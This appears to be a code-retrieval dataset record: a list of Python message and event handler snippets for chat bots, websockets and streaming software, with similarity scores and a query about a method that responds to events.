elif event == \"SwitchTransition\":\r\n pass\r\n\r\n elif event == \"TransitionListChanged\":\r\n pass\r\n\r\n elif event == \"TransitionDurationChanged\":\r\n pass\r\n\r\n elif event == \"TransitionBegin\":\r\n pass\r\n\r\n elif event == \"TransitionEnd\":\r\n pass\r\n\r\n elif event == \"TransitionVideoEnd\":\r\n pass\r\n\r\n #Profiles\r\n elif event == \"ProfileChanged\":\r\n pass\r\n\r\n elif event == \"ProfileListChanged\":\r\n pass\r\n\r\n #Streaming\r\n elif event == \"StreamStarting\":\r\n pass\r\n\r\n elif event == \"StreamStarted\":\r\n pass\r\n\r\n elif event == \"StreamStopping\":\r\n pass\r\n\r\n elif event == \"StreamStopped\":\r\n pass\r\n\r\n elif event == \"StreamStatus\":\r\n pass\r\n\r\n #Recording\r\n elif event == \"RecordingStarting\":\r\n pass\r\n\r\n elif event == \"RecordingStarted\":\r\n pass\r\n\r\n elif event == \"RecordingStopping\":\r\n pass\r\n\r\n elif event == \"RecordingStopped\":\r\n pass\r\n\r\n elif event == \"RecordingPaused\":\r\n pass\r\n\r\n elif event == \"RecordingResumed\":\r\n pass\r\n\r\n #Replay Buffer\r\n elif event == \"ReplayStarting\":\r\n pass\r\n\r\n elif event == \"ReplayStarted\":\r\n pass\r\n\r\n elif event == \"ReplayStopping\":\r\n 
pass\r\n\r\n elif event == \"ReplayStopped\":\r\n pass\r\n\r\n #Other\r\n elif event == \"Exiting\":\r\n pass\r\n\r\n #General\r\n elif event == \"Heartbeat\":\r\n pass\r\n\r\n elif event == \"BroadcastCustomMessage\":\r\n pass\r\n\r\n #Sources\r\n elif event == \"SourceCreated\":\r\n pass\r\n\r\n elif event == \"SourceDestroyed\":\r\n pass\r\n\r\n elif event == \"SourceVolumeChanged\":\r\n pass\r\n\r\n elif event == \"SourceMuteStateChanged\":\r\n pass\r\n\r\n elif event == \"SourceAudioDeactivated\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"SourceAudioActivated\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"SourceAudioSyncOffsetChanged\":\r\n pass\r\n\r\n elif event == \"SourceAudioMixersChanged\":\r\n pass\r\n\r\n elif event == \"SourceRenamed\":\r\n pass\r\n\r\n elif event == \"SourceFilterAdded\":\r\n pass\r\n\r\n elif event == \"SourceFilterRemoved\":\r\n pass\r\n\r\n elif event == \"SourceFilterVisibilityChanged\":\r\n source = self.obs.getSource(self.data[\"sourceName\"])\r\n if source != None:\r\n _filter = source.getFilter(self.data[\"filterName\"]) #type: ignore\r\n if _filter != None:\r\n _filter.setVisible(self.data[\"filterEnabled\"]) #type: ignore\r\n\r\n elif event == \"SourceFiltersReordered\":\r\n pass\r\n\r\n #Media\r\n elif event == \"MediaPlaying\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaPaused\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaRestarted\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaStopped\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaNext\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaPrevious\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaStarted\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaEnded\":\r\n #Unreleased\r\n pass\r\n\r\n #Scene Items\r\n elif event == \"SceneItemOrderChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemAdded\":\r\n pass\r\n\r\n elif event == \"SceneItemRemoved\":\r\n pass\r\n\r\n elif event == \"SceneItemVisibilityChanged\":\r\n scene = self.obs.getScene(self.data[\"scene-name\"])\r\n if scene != None:\r\n source = scene.getSource(self.data[\"item-name\"]) #type: ignore\r\n if source != None:\r\n source.setVisible(self.data[\"item-visible\"]) #type: ignore\r\n \r\n\r\n elif event == \"SceneItemLockChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemTransformChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemSelected\":\r\n pass\r\n\r\n elif event == \"SceneItemDeselected\":\r\n pass\r\n\r\n #Studio Mode\r\n elif event == \"PreviewSceneChanged\":\r\n pass\r\n\r\n elif event == \"StudioModeSwitched\":\r\n pass\r\n\r\n #Unhandled Events\r\n else:\r\n print(\"Unhandled event with data: \" + str(self.data))", "def test_im_chat_messages(self):\n pass", "def callback_botmessage(self, message):\n pass", "def callback_botmessage(self, message):\n pass", "def callback_botmessage(self, message):\n pass", "def _on_message(self, message):\n print(\"RECEIVED on \" + self.session_name + \":\")\n message_json = json.loads(message)\n print(json.dumps(message_json, sort_keys=True, indent=2, separators=(',', ':')))\n\n for singleMsg in message_json:\n self._process_message(singleMsg)", "def test_messages(self):\n pass", "def messages(request):\n ctx = {}\n messages = get_messages(request)\n if messages:\n ctx['mesgs'] = messages\n return ctx", "def onMessageEnd(self):", "def Message(self, *args, **kwargs):\n pass", "def message():\n if request.method == 'POST':\n db.log_msg(request.form['text'], request.cookies.get('username'))\n return 
db.get_all_messages()", "def on_message(self, msg) -> None:\n\n decoded_msg = json.loads(msg)\n message_type = decoded_msg[\"type\"]\n\n if message_type == MSG_SUBCRIPTIONS:\n\n product_ids = decoded_msg[\"channels\"]\n logging.debug(\"Subscriptions: {}\".format(product_ids))\n\n elif message_type == MSG_SNAPSHOT:\n\n product_id = decoded_msg[\"product_id\"]\n self._snapshot(decoded_msg)\n\n # Old best bid and ask doesn't exist yet, this will always set a new bbo\n self.set_if_new_bbo(product_id)\n\n elif message_type == MSG_L2UPDATE:\n\n product_id = decoded_msg[\"product_id\"]\n self.update(decoded_msg)\n\n self.set_if_new_bbo(product_id)\n\n self.event_count += 1", "def show_messages(self):\n for msg in self.messages:\n print msg['text']", "def message_callback(self, message):\n pass", "async def chat_message(self, event):\n if self.user and not self.user.is_authenticated:\n return\n\n user_id = event['user_id']\n message = event['message']\n created_at = event['created_at']\n publisher_full_name = event['publisher_full_name']\n\n await self.send(text_data=json.dumps({\n 'user_id': user_id,\n 'created_at': created_at,\n 'message': \"{}\".format(message),\n 'publisher_full_name': publisher_full_name,\n }))", "def on_message(self, message):\n print \"Client %s received a message : %s\" % (self.id, message)", "async def on_message_activity(self, turn_context: TurnContext):\n reply = MessageFactory.list([])\n # Get the state properties from the turn context.\n welcome_user_state = await self.user_state_accessor.get(\n turn_context, WelcomeUserState\n )\n\n if not welcome_user_state.did_welcome_user:\n welcome_user_state.did_welcome_user = True\n\n text = turn_context.activity.text.lower()\n\n if text in (\"hello\", \"hi\",\"intro\",\"help\",\"menu\"):\n #await self.__send_intro_card(turn_context)\n reply.attachments.append(self.create_signin_card())\n await turn_context.send_activity(reply)\n\n \n else:\n # This example hardcodes specific utterances. 
You should use LUIS or QnA for more advance language\n # understanding.\n print(\"Printing action------\",turn_context.activity.text)\n print(\"Printing JSON------\",turn_context._activity.value)\n \n\n if turn_context._activity.value is not None:\n print(\"Printing type------\",turn_context._activity.value[\"type\"])\n print(\"Printing customer id------\",turn_context._activity.value[\"customerId\"])\n print(\"Printing password------\",turn_context._activity.value[\"password\"])\n\n customerId = turn_context._activity.value[\"customerId\"]\n password = turn_context._activity.value[\"password\"]\n terms = turn_context._activity.value[\"terms\"]\n isvalid = True\n if (customerId is None) or (str(customerId).strip()==\"\"):\n isvalid = False\n await turn_context.send_activity(\"Please enter valid Customer ID\")\n if (password is None) or (str(password).strip()==\"\"):\n isvalid = False\n await turn_context.send_activity(\"Please enter valid Password\")\n if (terms is None or terms in (\"false\")):\n isvalid = False\n await turn_context.send_activity(\"Please accept the terms and conditions.\")\n\n if (isvalid and turn_context._activity.value[\"type\"] in (\"Login\")):\n # defining a params dict for the parameters to be sent to the API\n PARAMS = {'userName': customerId, 'password': password}\n # sending get request and saving the response as response object\n r = requests.get(url=\"http://localhost:8080/login\", params=PARAMS)\n # extracting data in json format\n data = r.json()\n print(\"printing response \", data[\"loginStatus\"])\n if (data[\"loginStatus\"] is not None and data[\"loginStatus\"] in (\"success\")):\n await turn_context.send_activity(\"Login Succeded\")\n await turn_context.send_activity(\"An OTP is sent to your registered mobile number xxxxxxxx90.\")\n await turn_context.send_activity(\"Please enter the OTP.\")\n else:\n await turn_context.send_activity(\"Login Failed. Please try again\")\n # for key in turn_context._activity.value:\n # print(turn_context._activity.value[key])\n \n else:\n text = turn_context.activity.text.lower()\n \n if text in (\"369\"):\n await turn_context.send_activity(\"Thanks!!\")\n await self.__send_intro_card(turn_context)\n elif text in (\"sign-in\", \"login\"):\n await self.__login_otp_card_card(turn_context)\n elif text in (\"hello\", \"hi\",\"intro\",\"help\",\"menu\"):\n await self.__send_intro_card(turn_context)\n #await turn_context.send_activity(f\"You said { text }\")\n elif text in (\"account balance\"):\n await self.__send_accountbalance_card(turn_context)\n await turn_context.send_activity(\"Also, your deposit xxxxxxxxx9243 is closed pre-maturely as per your request and amount is credited to your third party account.\")\n elif text in (\"xxxxxxxxx4567\"):\n await self.__list_accountTransaction_card(turn_context)\n await self.__mobile_billDue_card(turn_context)\n elif text in (\"yes, pay my mobile bill\"):\n await self.__show_invoice_card(turn_context)\n await self.__show_selectAccountForBill_card(turn_context)\n elif text in(\"debit from xxxxxxxxx4567\"):\n await turn_context.send_activity(\"An OTP is sent to your registered mobile number xxxxxxxx90.\")\n await turn_context.send_activity(\"Please enter the OTP.\")\n elif text in (\"1234\"):\n await turn_context.send_activity(\"Transaction Successful !! 
Mobile bill paid for $100 from your account number xxxxxxxxx4567\")\n await turn_context.send_activity(\"As a loyal customer, we are happy to offer you one year free VISA card which comes with $25 movie voucher.\\n\\n Also your balance reward points 514 from card xxxxxxxxxxxx7653 will be added to the new card.\")\n await self.__show_congratulations_card(turn_context)\n elif text in (\"credit card\"):\n await turn_context.send_activity(\"Credit card xxxxxxxxxxxx7653 \\n\\n Current outstanding is $0.00 \\n\\n Card closed on 09/01/2020 \\n\\n Balance reward points are 514\")\n elif text in (\"service requests\"):\n await turn_context.send_activity(\"Currently there are no open service requests.\")\n elif text in (\"xxxxxxxxx4566\"):\n await turn_context.send_activity(\"Your current account xxxxxxxxx4566 is Active, but there are no transactions on it.\")\n elif text in (\"debit from xxxxxxxxx4566\"):\n await turn_context.send_activity(\"Insufficient account balance. Please choose another account\")\n await self.__show_selectAccountForBill_card(turn_context)\n #else:\n #await self.__send_intro_card(turn_context)", "def display_messages(self, layout):", "def onMessageFrame(self, payload):", "def get_messages(\n event: Dict[str, Any]\n ) -> List[Dict[str, Any]]:\n reply_message = event.get(\"reply_message\", {})\n return [reply_message] if reply_message else event.get(\"fwd_messages\", [])", "def message_handler(message):\n location = database.get_location(message.from_user.id)\n if not location:\n return {\"text\": \"Для поиска лекарств отправь своё местоположение\"}\n\n return get_drugs_message(find_drugs(message.text.encode('utf-8')))", "def handle_message() -> Response:\n commend = request.get_json()[\"message\"][\"text\"]\n chat_id = request.get_json()[\"message\"][\"chat\"][\"id\"]\n\n if commend == \"/start\":\n txt = \"Welcome to the shopping bot.\"+'\\n'+\"please enter category, or type popular to get the most popular searches \"\n elif str(commend).lower() in items:\n order[0] = str(commend)\n txt = \"choose color\"\n elif str(commend).lower() in colors:\n if order[0] == 0:\n txt = \"choose category\"\n order[1] = str(commend)\n txt = \"choose size\"\n elif str(commend).lower() in size:\n order[2] = str(commend)\n rec(chat_id, order)\n txt = get_url(order)\n elif str(commend).lower() == \"popular\":\n txt = get_popular(orders_dic)\n else:\n txt = \"try again\"\n # print(orders_dic)\n chat_id = request.get_json()[\"message\"][\"chat\"][\"id\"]\n print(chat_id)\n requests.get(f\"https://api.telegram.org/bot{TOKEN}/sendMessage?chat_id={chat_id}&text={txt}\")\n return Response(\"Success\")", "def handle_message(event):\n intention = parse_intention(event.message.text)\n if intention == config.QUERY_INTENTION:\n handle_query_weather_message(event)\n elif intention == config.SUBSCRIBE_INTENTION:\n handle_subscribe_message(event)\n else:\n handle_unknown_message(event)", "def listen():\n if request.method == 'GET':\n print request\n return verify_webhook(request)\n\n if request.method == 'POST':\n payload = request.json\n event = payload['entry'][0]['messaging']\n for x in event:\n if is_user_message(x):\n text = x['message']['text']\n sender_id = x['sender']['id']\n respond(sender_id, text)\n\n return \"ok\"", "def callback_message(self, message):\n pass", "def callback_message(self, message):\n pass", "def showMessage(self):", "def pubsub_consume(event, context):\n pubsub_message = base64.b64decode(event['data']).decode('utf-8')\n event_data = json.loads(pubsub_message)\n\n message = 
event_data['event']\n channel = message['channel']\n\n if message.get('bot_id') is None:\n text = message.get('text')\n\n if \"help\" in text:\n slack_text = \"\\n\\n *How to use the Tableau Slackbot* :robot_face: : \\n\" \\\n \"\\n 1. `list @tableau_server_app`: list views available to output to Slack\" \\\n \"\\n\\n 2. `gimmie @tableau_server_app What If Forecast`: generate the report\"\n response = client.chat_postMessage(\n channel=channel,\n text=slack_text)\n return response\n\n if \"list\" in text:\n slack_text = list('view')\n response = client.chat_postMessage(\n channel=channel,\n text=slack_text)\n return response\n\n if \"gimmie\" in text:\n\n filepath = time.strftime(\"%Y%m%d-%H%M%S\")\n view = event_data['event']['blocks'][0]['elements'][0]['elements'][2]['text']\n view_list = list('view')\n if view.strip() in view_list:\n generate_report(view, filepath)\n\n # Upload view from /tmp to Slack\n response = client.files_upload(\n channels=channel,\n file=\"/tmp/view_{0}.png\".format(filepath),\n title=\"View\"\n )\n\n # Delete the view generated locally\n if os.path.exists(\"/tmp/view_{0}.png\".format(filepath)):\n os.remove(\"/tmp/view_{0}.png\".format(filepath))\n\n else:\n slack_text = \":shrug: See the available views with: `list @tableau_server_app`\"\n response = client.chat_postMessage(\n channel=channel,\n text=slack_text)\n\n return response", "def getMessages(self):\n raise NotImplementedError(\"Child class must implement this\")", "async def on_chat_message(self, chat_message):\n pass", "def messages(self):\n return {}", "async def chat_message(self, event):\n message = event['message']\n await self.send_json({\n 'message': message\n })", "def handle(self, message):\n for callback in self.callbacks:\n callback(message['data'])", "def get_loaded_messages(self):\n self.chat.click()\n messages = []\n for message in self.chat.find_elements(By.XPATH, \"\"\"//*[@id=\"main\"]/div[3]/div/div/div[3]/*\"\"\"):\n messages.append(MessageElement(message))\n return messages", "def getmessage(self, update, context):\r\n\r\n redirect_uri = \"https://thawing-ridge-47246.herokuapp.com\"\r\n\r\n # настройка соединения\r\n flow = Flow.from_client_secrets_file(\r\n 'credentials.json',\r\n scopes=SCOPES,\r\n redirect_uri=redirect_uri)\r\n\r\n code = self.get_code()\r\n\r\n flow.fetch_token(code=code, code_verifier=\"111\") # устанавливаем соединение с гуглом\r\n\r\n session = flow.authorized_session() # создаем сессию\r\n response = session.get('https://www.googleapis.com/gmail/v1/users/me/messages').json() # формируем запрос и получаем ответ сервера\r\n\r\n messages = response[\"messages\"]\r\n\r\n # у каждого из сообщений достаем id\r\n for message in messages[0:10]:\r\n mid = message['id']\r\n\r\n # получаем сообщение по id\r\n message_message = session.get(f'https://www.googleapis.com/gmail/v1/users/me/messages/{mid}').json()\r\n\r\n # информация об отправителе, получателе и теме сообщения хранится в ключе 'payload' --> 'headers'\r\n headers = message_message['payload']['headers']\r\n\r\n from_who = None\r\n to_whom = None\r\n subject = None\r\n\r\n for item in headers:\r\n if item['name'] == 'From':\r\n from_who = item['value']\r\n elif item['name'] == 'To':\r\n to_whom = item['value']\r\n elif item['name'] == 'Subject':\r\n subject = item['value']\r\n\r\n # ищем текст сообщения\r\n # достаем из сообщения его части\r\n message_payload_parts = message_message['payload']['parts']\r\n zero_part = message_payload_parts[0]\r\n\r\n if zero_part['mimeType'] == 'text/plain':\r\n 
self.message_without_attachments(context, message_payload_parts, from_who, to_whom, subject)\r\n elif zero_part['mimeType'] == 'multipart/alternative':\r\n self.message_with_attachments(session, mid, context, zero_part, message_payload_parts, from_who,\r\n to_whom, subject)\r\n\r\n context.bot.send_message(chat_id=update.message.chat_id, text=f'Done.')", "def _report_message(message, level, request, extra_data, payload_data):\n if not _check_config():\n return\n\n filtered_message = events.on_message(message,\n request=request,\n extra_data=extra_data,\n payload_data=payload_data,\n level=level)\n\n if filtered_message is False:\n return\n\n data = _build_base_data(request, level=level)\n\n # message\n data['body'] = {\n 'message': {\n 'body': filtered_message\n }\n }\n\n if extra_data:\n extra_data = extra_data\n data['body']['message'].update(extra_data)\n\n request = _get_actual_request(request)\n _add_request_data(data, request)\n _add_person_data(data, request)\n _add_lambda_context_data(data)\n data['server'] = _build_server_data()\n\n if payload_data:\n data = dict_merge(data, payload_data, silence_errors=True)\n\n payload = _build_payload(data)\n send_payload(payload, payload.get('access_token'))\n\n return data['uuid']", "def on_event():\n\n event = request.get_json()\n \n token_status, token_text = validate_token()\n\n if token_status != 0:\n return json.jsonify({'text': token_text})\n\n if event['type'] == 'ADDED_TO_SPACE' and event['space']['type'] == 'ROOM':\n text = 'Thanks for adding me to \"%s\"! For help type @bot help' % event['space']['displayName']\n \n elif event['type'] == 'MESSAGE':\n\n room_name = event['space']['name'].split('/')[1]\n commands = ['list', 'add', 'remove', 'help']\n\n try:\n param = event['message']['text'].split()[1:][0]\n except:\n text = _help()\n return json.jsonify({'text': text})\n\n if param in commands:\n\n if param == 'list':\n text = _list(room_name)\n\n elif param == 'add':\n text = _add(event, room_name)\n\n elif param == 'remove':\n text = _remove(event, room_name)\n\n elif param == 'help':\n text = _help()\n return json.jsonify({'text': text})\n \n else:\n text = send_msg(event, room_name)\n\n else:\n return\n \n return json.jsonify({'text': text})", "def message(**payload):\n web_client = payload[\"web_client\"]\n\n # Getting information from the response\n data = payload[\"data\"]\n channel_id = data.get(\"channel\")\n text = data.get(\"text\")\n subtype = data.get(\"subtype\")\n ts = data['ts']\n user = data.get('username') if not data.get('user') else data.get('user')\n # Creating a Converstion object\n message = Message(ts, user, text)\n\n # Appending the converstion attributes to the logs\n conversation.append(message.toDict())\n\n if subtype == 'bot_message': return\n\n do_respond(web_client, channel_id, text)", "def listener(messages):\n for m in messages:\n chatid = m.chat.id\n print(str(chatid))\n if m.content_type == 'text':\n text = m.text\n tb.send_message(chatid, text)", "def handle_message(self, msg):\n self.messages.append({\n 'type': msg.category,\n 'module': msg.module,\n 'obj': msg.obj,\n 'line': msg.line,\n 'column': msg.column,\n 'path': msg.path,\n 'symbol': msg.symbol,\n 'message': msg.msg,\n 'message-id': msg.msg_id,\n })", "def on_message(self, event):\n self.response = event.message\n self.connection.container.yield_() # Wake up the wait() loop to handle the message.", "def events(self):", "def on_message(self, ws, message):\n message = json.loads(message)\n if message['type'] == 'error':\n self.on_error(None, 
message['message'])\n elif message['type'] == 'subscriptions':\n print(\"Subscribed to {}\".format(', '.join([ channel['name'] for channel in message['channels'] ])))\n else:\n if ((message['type']=='ticker' and message['product_id'] in self._ticker) or \n (message['type'] in [\"snapshot\", \"l2update\"] and message['product_id'] in self._level2) or \n (message['type'] in [\"received\",\"open\",\"done\",\"match\",\"change\",\"activate\"] )):\n self.messages.append(message)\n elif message['type']=='heartbeat':\n self.updated_time = time.time()", "def on_message(self, msg):\n self.log.info(msg)", "def handle_message(self, message):\n print \"[WARNING] No message handling implemented!\"", "def handle_text_messages(self, update, context):\n\n # Split user input into single words\n words = set(update.message.text.lower().split())\n logging.debug(f'Received message: {update.message.text}')\n\n # For debugging: Log users that received something from bot\n chat_user_client = update.message.from_user.username\n if chat_user_client == None:\n chat_user_client = update.message.chat_id\n\n\n # Possibility: received command from menu_trigger\n for Trigger in self.menu_trigger:\n for word in words:\n if word.startswith(Trigger):\n\n self.show_menu(update, context)\n logging.info(f'{chat_user_client} checked out the menu!')\n\n return\n\n\n # Possibility: received command from loan_stats_trigger\n for Trigger in self.loan_stats_trigger:\n for word in words:\n if word.startswith(Trigger):\n\n #self.send_textfile('under_construction.txt', update, context)\n self.show_loan_stats(update, context)\n self.send_signature(update, context)\n logging.info(f'{chat_user_client} got loan stats!')\n\n return\n\n # Possibility: received command from il_trigger\n for Trigger in self.il_trigger:\n for word in words:\n if word.startswith(Trigger):\n\n self.send_textfile('under_construction.txt', update, context)\n #self.show_il(update, context)\n #self.send_signature(update, context)\n logging.info(f'{chat_user_client} tried to get IL info!')\n\n return\n\n # Possibility: received command from assets_trigger\n for Trigger in self.assets_trigger:\n for word in words:\n if word.startswith(Trigger):\n\n self.send_textfile('under_construction.txt', update, context)\n #self.self.show_assets(update, context)\n #self.send_signature(update, context)\n logging.info(f'{chat_user_client} tried to get asset info!')\n\n return", "def _serialize_event_messages(event):\n if event.content_type == MessagingEvent.CONTENT_EMAIL:\n return _get_messages_for_email(event)\n\n if event.content_type in (MessagingEvent.CONTENT_SMS, MessagingEvent.CONTENT_SMS_CALLBACK):\n return _get_messages_for_sms(event)\n\n if event.content_type in (MessagingEvent.CONTENT_SMS_SURVEY, MessagingEvent.CONTENT_IVR_SURVEY):\n return _get_messages_for_survey(event)\n return []", "def on_text_message(self, update, context):\n chat_id = update.effective_chat.id\n log.info(\"Msg from:%s `%s`\", chat_id, update.effective_message.text)\n\n if context.user_data[\"state\"] == c.State.EXPECTING_AMOUNT:\n log.info(\"Vol:%s spent %s MDL on this request\", chat_id, update.effective_message.text)\n # TODO validate the message and make sure it is a number, discuss whether this is necessary at all\n # TODO send this to the server, we need to define an API for that\n request_id = context.user_data[\"current_request\"]\n\n # Write this amount to the persistent state, so we can rely on it later\n context.bot_data[request_id][\"amount\"] = update.effective_message.text\n\n # Then we 
have to ask them to send a receipt.\n self.send_message_ex(update.message.chat_id, c.MSG_FEEDBACK_RECEIPT)\n context.user_data[\"state\"] = c.State.EXPECTING_RECEIPT\n return\n\n if context.user_data[\"state\"] == c.State.EXPECTING_FURTHER_COMMENTS:\n log.info(\"Vol:%s has further comments: %s\", chat_id, update.effective_message.text)\n request_id = context.user_data[\"current_request\"]\n context.bot_data[request_id][\"further_comments\"] = update.effective_message.text\n self.finalize_request(update, context, request_id)\n return\n\n if context.user_data[\"state\"] == c.State.EXPECTING_PROFILE_DETAILS:\n self.build_profile(update, context, raw_text=update.effective_message.text)\n return\n\n # if we got this far it means it is some sort of an arbitrary message that we weren't yet expecting\n log.warning(\"unexpected message ..........\")", "async def chat_message(self, event):\n await self.send_json(\n return_value(\n ACTION_MESSAGE,\n event['label'],\n event['username'],\n MSG_MESSAGE,\n event['message']\n )\n )", "def MultiMessage(self, *args, **kwargs):\n pass", "async def messages(self, ctx):\n\n\t\tawait self.message_leaderboard(ctx, \"messages\")", "def get_message(self, i):\n pass", "def on_bot_message():\n handle_bot_message(request.get_json())\n return \"ok\"", "def messaging_events(payload):\n data = json.loads(payload)\n message = data[\"entry\"][0][\"messaging\"]\n for event in message:\n if \"message\" in event and \"text\" in event[\"message\"]:\n # if message in event and text in message set id and text\n sender_id = event[\"sender\"][\"id\"]\n text = event[\"message\"][\"text\"]\n quick_reply_payload = None\n\n if \"quick_reply\" in event[\"message\"]:\n # if quick_reply i message set payload\n quick_reply_payload = event[\"message\"][\"quick_reply\"][\"payload\"]\n yield sender_id, text, quick_reply_payload\n else:\n yield event[\"sender\"][\"id\"], \"I can't echo this\", None", "def receive(self, message):", "def handle_send_messages():\n items = {k: v for k, v in subscribers.items() if v}\n for key in items:\n subscriber_obj = items[key]\n sim_id = get_sim_id(subscriber_obj)\n if sim_id and type(sim_id) is int:\n frame_messenger(subscriber_obj)\n elif sim_id and sim_id == \"live\":\n live_messenger(subscriber_obj)", "def send(self, event, message):\n pass", "def test_sendimmessages(self):\n pass", "def messages(self):\n return MessageNotification.messages", "def process(self, message: Message, **kwargs: Any) -> None:", "def handle_pubnub_message(self, message: dict) -> None:\n super().handle_pubnub_message(message)\n\n event = None\n\n if message.get(Attribute.CAMERA_THUMBNAIL_DATE):\n event = THUMBNAIL_READY\n elif message.get(Attribute.DING_DONG):\n event = DOORBELL_DING\n elif message.keys() == set([Attribute.ID, Attribute.TYPE]):\n event = VIDEO_READY\n elif message.get(Attribute.VISITOR_DETECTED) or message.keys() in [\n set([Attribute.ID, Attribute.ACTUAL_TYPE, Attribute.STATE]),\n set([Attribute.ID, Attribute.DETER_ON_DUTY, Attribute.TYPE]),\n ]:\n event = MOTION_DETECTED\n\n if event is not None:\n self.emit(event, {\"message\": message})\n\n _LOGGER.debug(\"Message received by %s: %s\", self.name, message)", "def on_message(self, data):\n req = json.loads(data)\n self.serve(req)", "def on_message(self, data):\n req = json.loads(data)\n self.serve(req)", "def get_message_handlers(self):\n\t\treturn self.message_handlers", "async def chat_message(self, event):\n\n print(\"PublicChatConsumer\", \"chat_message from user\", event[\"user_id\"])\n await 
self.send_json({\n \"msg_type\": MSG_TYPE_MESSAGE,\n \"profile_image\": event[\"profile_image\"],\n \"username\": event[\"username\"],\n \"user_id\": event[\"user_id\"],\n \"message\": event[\"message\"],\n \"natural_timestamp\": humanize_or_normal(timezone.now())\n })", "def _r_handle_message_contents(self, msg, protocol):\n if isinstance(msg, ResponseMessage):\n d = self._waiting_messages.pop(msg.response_to, None)\n if d is not None:\n d.callback(msg)\n elif isinstance(msg, ServerMotdMessage):\n print(\"Connected: %s\" % msg.motd)\n self._r_successful_connection()\n elif isinstance(msg, EventMessage):\n callback = self._event_callbacks.get((msg.service_name, msg.event_name))\n if callback is not None:\n threads.deferToThread(callback, *msg.pargs, **msg.kwargs)", "def get_messages(self):\n return self.messages_received", "def get_messages(self):\n return self.messages_received", "def get_messages(self):\n return self.messages_received" ]
[ "0.64154905", "0.63751894", "0.635842", "0.62978166", "0.6275776", "0.62662673", "0.6228096", "0.6210156", "0.6176662", "0.6156185", "0.6149644", "0.61168385", "0.60755175", "0.6055626", "0.6054083", "0.6031606", "0.6029565", "0.6019241", "0.5985364", "0.5980711", "0.59471154", "0.5932648", "0.59226626", "0.59200895", "0.5905758", "0.59049445", "0.5897722", "0.5895032", "0.5876532", "0.5873094", "0.58730024", "0.5862964", "0.58533174", "0.58512735", "0.58512735", "0.58512735", "0.58428603", "0.5821677", "0.5819039", "0.58146536", "0.5813998", "0.5801771", "0.57914555", "0.5762818", "0.5762054", "0.57574314", "0.57387865", "0.57377726", "0.57245606", "0.5721118", "0.5703146", "0.5701226", "0.5701181", "0.56955093", "0.56943184", "0.5690268", "0.5690268", "0.5682051", "0.56818527", "0.56635946", "0.56533086", "0.5652328", "0.5639714", "0.5636847", "0.56318957", "0.5628387", "0.56239474", "0.56183034", "0.5617216", "0.56115556", "0.56046045", "0.55961007", "0.5593991", "0.5592689", "0.55923015", "0.559133", "0.55904317", "0.5580793", "0.55753183", "0.5575297", "0.5572395", "0.5571826", "0.5571222", "0.5570502", "0.55678976", "0.5564545", "0.5563295", "0.5555898", "0.5550811", "0.5542564", "0.5538594", "0.55361897", "0.5534987", "0.5534987", "0.55346024", "0.5520096", "0.5519228", "0.55154204", "0.55154204", "0.55154204" ]
0.69531924
0
This method is responsible for responding to events hit on synchronous api
def respond_to_events(self): event_response = MessageEventHandler(self.state, self.meta_data, self.message_data).handle_events(events=self.events) if event_response == []: return {} return event_response[0]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def run(self):\n current_status = \"Init\"\n while self.expected_status != current_status:\n await asyncio.sleep(1)\n async with aiohttp.ClientSession() as session:\n async with session.get(self.url) as response:\n api_call_result = await response.json()\n current_status = api_call_result[\"status\"]\n \n # Send our single event and then we're done\n yield TriggerEvent(api_call_result)", "def event_handler(self, response):\n pass", "async def _response_handler(self):", "async def _execute(self):", "async def request(self) -> Any:\n raise NotImplementedError()", "async def _handle_request(self, request: web.Request) -> web.Response:\n event = await request.json()\n # This handler will be called on the server thread. Call the external\n # handler on the app thread.\n self._main_loop.call_soon_threadsafe(self.handle_event, event)\n return web.Response(text=\"OK\")", "async def execute(self):", "async def perform_action(self) -> None:", "def async_update(self):", "async def run(self) -> None:", "async def run(self) -> None:", "async def do_run(self, event_bus: EndpointAPI) -> None:\n ...", "def on_success(self) -> None:", "def get_api_event(self):\n pass", "def __update_data(self):\r\n # loop = asyncio.get_event_loop()\r\n api_base_info_req = self.loop.run_in_executor(None, self.__get_base_info_api)\r\n api_status_req = self.loop.run_in_executor(None, self.__get_status_api)\r\n api_status_res = yield from api_status_req\r\n api_base_info_res = yield from api_base_info_req\r\n\r\n self.__set_base_info_api(api_base_info_res)\r\n self.__set_status_api(api_status_res)", "async def handle_request(self, request: aioweb.request.Request):", "def callback(self):\n pass # pragma: no cover", "def run(self):\n self.logger.info(\"start consuming api calls\")\n while not self.shutdown:\n self.rpc.listen()", "async def async_update(self):", "def run(self):\n self.initialize()\n\n # run the start callback\n tools.run_callback(\"start\", {'request': self._request})\n\n data = self._request.getData()\n pyhttp = self._request.getHttp()\n config = self._request.getConfiguration()\n\n # allow anyone else to handle the request at this point\n handled = tools.run_callback(\"handle\", \n {'request': self._request},\n mappingfunc=lambda x,y:x,\n donefunc=lambda x:x)\n\n if not handled == 1:\n blosxom_handler(self._request)\n\n # do end callback\n tools.run_callback(\"end\", {'request': self._request})", "async def on_ready(self) -> None:", "def call_async(self, name, *args, **kwargs):", "def ProcessEvents(self):\n self.work_queue.put(self.__ProcessEventsAsync)", "def handle(self) -> None:\r\n\r\n if self.data.get(\"message-id\") != None:\r\n if self.data[\"status\"] == \"error\":\r\n print(self.data[\"error\"])\r\n return\r\n else:\r\n requestData = self.obs.pendingResponses.pop(self.data[\"message-id\"])\r\n request = requestData[\"request-type\"]\r\n #Requests as of version 4.8.0\r\n\r\n #General\r\n if request == \"GetVersion\":\r\n pass\r\n\r\n elif request == \"GetAuthRequired\":\r\n if self.data[\"authRequired\"]:\r\n secret_string: str = self.obs.password + self.data[\"salt\"]\r\n secret_hash: sha256 = sha256(secret_string.encode(\"utf-8\"))\r\n secret: bytes = b64encode(secret_hash.digest())\r\n\r\n response_string: str = secret.decode(\"utf-8\") + self.data[\"challenge\"]\r\n response_hash: sha256 = 